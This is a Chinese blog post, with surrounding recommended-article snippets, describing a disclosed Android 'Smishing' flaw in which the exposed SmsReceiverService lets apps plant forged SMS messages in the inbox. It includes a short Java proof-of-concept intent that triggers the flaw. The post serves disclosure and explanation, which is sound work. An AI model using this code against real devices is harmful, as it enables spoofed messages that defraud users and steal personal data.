Android短信欺诈(Smishing)漏洞

最新推荐文章于 2022-04-25 09:39:25 发布
最新推荐文章于 2022-04-25 09:39:25 发布
阅读量6.3k 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/androidsecurity/article/details/8631829
版权

本文章由Jack_Jia编写,转载请注明出处。  
文章链接:http://blog.csdn.net/jiazhijun/article/details/8631829
作者:Jack_Jia    邮箱: 309zhijun@163.com


一、漏洞描述

    北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中发现了一个存在于Android 平台的“短信欺诈”(Smishing)漏洞,据悉,该漏洞可以允许应用在Android平台上进行短信伪装,且在所有版本的Android软件中都存在这一漏洞。
  攻击者可利用漏洞窃取个人资料,攻击者也可以利用漏洞,将自己的手机号码伪装成银行或亲友等号码。

二、影响版本

    Froyo (2.2.x), Gingerbread (2.3.x), Ice Cream Sandwich (4.0.x), and Jelly Bean (4.1)

三、漏洞原理

    Android系统有一套比较完善的安全体系,权限管理就是其中的一部分。当应用需要操作敏感数据时,需要申请相应的权限。
    该系统漏洞能够使攻击者无需申请任何权限发送短信到用户收件箱。
    出现该漏洞的原因是Android系统的com.android.mms.transaction.SmsReceiverService系统服务未判断启动服务的调用者,攻击者可以通过该应用发送伪装短信到用户收件箱。本漏洞实质上是一种能力的泄漏。

四、POC代码

    Intent intent = new Intent();
    byte[] pdus = new byte[]{...}; // the sms pdus bytes
    intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService");
    intent.setAction("android.provider.Telephony.SMS_RECEIVED");
    intent.putExtra("pdus", new byte[][]{pdus});
    this.startService(intent); 


五、相关链接

    http://www.csc.ncsu.edu/faculty/jiang/smishing.html
    http://www.newhua.com/2012/1109/183383.shtml

Jack_Jia
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
smishing:窃听拦截
06-07
粉碎块从 Google Play 下载: : 短信拦截(SMS Smising Block)是一种简单、易于移动的安全解决方案。 仅用于 Smising 的安装将确保您的安全。 SMS Smising 实时攻击检测和拦截功能:短信中包含一个字符串格式的URL...
android手机短信诈骗原理,安卓系统均存短信欺诈漏洞 专家:系统先天不足
weixin_36333534的博客
05-25 398
国际在线报道:据国外媒体11月5号报道,美国北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中侯晨 发现了一个存在于安卓平台的“短信欺诈漏洞,可能会使众多使用该平台的用户受到影响。什么是“短信欺诈漏洞,它会造成什么影响?作为普通用户我们又应当如何防范呢?首先我们通过一个声音短片来了解一下这次新发现的漏洞。研究人员称,“短信欺诈漏洞可以允许各种应用在安卓平台上进行短信伪装,且在所...
谷歌官方证实所有Android版本存短信欺诈漏洞
Cc:Welcome
12-12 630
谷歌证实所有Android版本存短信欺诈漏洞 凤凰科技讯 北京时间11月5日晚间消息,据科技博客TheNextWeb报道,美国北卡罗来纳州州立大学(以下简称NCSU)研究员最近发现了一个存在于Android平台的“短信欺诈”(Smishing)漏洞,黑客可以通过该漏洞短信进行伪装,盗取用户个人信息、账户密码等。目前,谷歌Android团队已证实该漏洞的存在,已认真对待并即刻展开了调查。
CVE-2019-8660 iMessage 漏洞复现
十年磨一剑,霜刃未曾试!
08-22 2046
CVE-2019-8660 iMessage 漏洞复现 近期谷歌的研究人员披露了 5 个 iOS 中安全漏洞,并公布了 POC(Proof of concept),攻击者利用这些漏洞可以通过 iMessage 发送精心设计的消息来攻击 iOS 设备,这些漏洞不需要和任何用户交互,只要目标机 iMessage 信息接收成功即可触发漏洞。 CVE-2019-8660、 CVE-2019-8662、 C...
anti-fraud-admin  反欺诈后台
wange6906的博客
04-26 2751
172.30.15.21 项目运行路径:/usr/local/apache-tomcat-anti-fraud-web-8082/webapps/anti-fraud-admin-web* 测试页面:http://172.30.15.20:8080/anti-fraud/services/bairong.jsp 1.备份包:Codebackup # cd /app/Codebackup/ #mkdir 2020-03-18 #cd 2020-03-18 ...
android漏洞收集3-短信程序smsreceiverservice服务暴露
10-11 1801
1.漏洞原因 产生漏洞的主要原因是,系统预装的短信程序中,下列服务被暴露(设置为了android:export="true"): com.android.mms.transaction.SmsReceiverService 任何第三方软件可以通过名为android.provider.Telephony.SMS_RECEIVED的action,加上自己构造的短信或彩信来调用它,触发系统的短信
Smishing_Detector_app:使用此android应用程序,用户可以获得网络钓鱼的基本知识,它将具有检查URL的功能。 并且还可以选择直接在cybercrime.gov.in上进行举报
02-11
Smishing_Detector_app 像truecaller这样的应用程序会根据用户的垃圾邮件报告并根据可疑关键字对垃圾短信进行分类。 像下面这样,有人在“恭喜!”一词的基础上找到了一份合适的工作。 (有时用于伪装)truecaller被...
Smishing-Detection-with-NLP-and-ML-Algorithms
04-12
NLP和ML算法的杂音检测
一种基于内容的移动环境中嗅觉检测方法-研究论文
05-19
垃圾邮件是短信和网络钓鱼的组合,攻击者通过发送到他们的移动设备的文本消息将移动用户作为攻击目标。 这些文本消息包含一个链接,该链接会将用户重定向到恶意网站。 过去几年中,研究人员提出了许多方法来减轻...
一种使用深度包检测和深度流检测的鱼叉式网络钓鱼检测方法-研究论文
05-19
在互联网银行时代,大多数人可能会听到“网络钓鱼”一词,它与互联网欺诈以及社会工程有关。 通常,这是通过向目标用户发送带有嵌入式超链接的电子邮件来窃取其用户名,密码,交易密码等来完成的。此外,网络钓鱼者...
Transfer Learning Using ConvolutionalNeural Networks for Face Anti-spoofifing
CoderWangSon
05-17 445
Transfer Learning Using ConvolutionalNeural Networks for Face Anti-spoofifing 标签: 论文 spoofing 论文出处:Springer International Publishing AG 2017 本文提出的方法 本文其实就是进行了迁移学习,因为迁移学习对于数据集小不能进行大规模训练(会过拟合)会有效果。我觉得可...
Android-SMS
dxm809的博客
06-12 319
/****************************MainActivity *******************************************/ package com.cs.dxm.smstest; import android.content.IntentFilter; import android.os.Bundle; import android.supp...
Android手机App安全漏洞整理
shayuchaor的博客
03-07 1万+
APP安全漏洞整理 1.源码安全漏洞 1.1 代码混淆漏洞 当前APK文件的安全性是非常令人堪忧的。APK运行环境依赖的文件/文件夹 res、DEX、主配文件Lib 只有简单的加密或者甚至没有任何加密。诸如apktool这类工具可轻易将其破解,再配合其他例如dex2jar、jd-gui等工具基本可以做到:源码暴露、资源文件暴露、主配文件篡改、核心SO库暴露、暴力破解恶意利用等。因此需要对安卓...
Android 教程系列第 10 篇】史上最全的 Android 应用包名汇总,含主流应用商店包名,持续更新...
热门推荐
“Allen Su”的博客
09-15 1万+
史上最全的 Android 应用包名汇总,含主流应用商店包名,持续更新 主流应用商店的包名,系统应用的包名
初次开发Android APP遇到的几个问题及其解决
qxd100的博客
11-03 4648
(1)MAC 上不能直接使用subversion。 Error: You have not agreed to the Xcode license. Please resolve this by running:   sudo xcodebuild -license You have not agreed to the Xcode license agreements. Yo
Android 伪造短信
云守护的专栏
03-26 2969
//伪造短信到系统信箱 private static void createFakeSms(Context context, String sender, String body) { byte[] pdu = null; byte[] scBytes = PhoneNumberUtils .networkPortionToCalledPartyBCD("000000000
somCNS短信接口替换
mindev的博客
10-27 890
SOMCNS采用ThinkPHP + MySQL 开发语言,完全面向对象的技术架构设计开发。完全开源,二次开发非常方便,小编对他还是比较了解的,今天小编就来分享一下如何进行二次开发,我以替换短信接口为例,一步一步的教大家如何进行开发,使用的接口是我们短信宝群发平台的短信接口,我们短信宝群发短信平台非常稳定,发送速度快,注册还送测试短信。我们打开项目\App\Lib\Class\Smsapi.clas
开源项目之Android Ecclesia(短信应用)
banketree
06-14 2900
Ecclesia 是一个 Android 的应用程序,该用户程序在手机接收到短信时会自动通过表单提交的方式将短信息发送到指定的URL。 项目如图: 源码简单移动,就直接贴出主要源码了! ActivityEcclesia.java private void onInit() { try { String[] projection = new String[] {
Android短彩信源码解析-短信发送流程(一)
hailushijie的专栏
08-22 7881
有人问我怎么了解原生应用的流程,可能每个人有最适合每个人的方法,现将我的方法说一下,供大家参考: 1、通过DEBUG,DEBUG可以了解每一步代码做了什么,而且可以看到堆栈执行过程。 2、通过打Log的方式。在自己不了解的流程模块打大量的log信息,根据log信息,摸清“模块”的底细。 上述两种方式都需要足够的耐心,但是逐渐接触谜团的真相的过程,确实很享受。好奇心是程序猿,攻城狮的朋友。 现将短信发送的流程整理一下,不当之处请大家斧正。
Android APP漏洞之战(9)——验证码漏洞详解
最新发布
键盘的起始页
04-25 1928
开始引入CA证书校验机制,这里先会涉及到Https的单向认证机制 上述步骤4就进行证书校验的环节,而这里的证书便是将手机内置的证书和客户端的证书进行校验,来判断是否合法 1 2 3 Https原理:非对称+对称连接 (1)非对称主要是为了传输对称连接所需要密钥和证书校验 (2)对称连接是加密密码可以安全传输,就可以采用对称连接 Android4.4-Android7.0 这个阶段,Androi...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值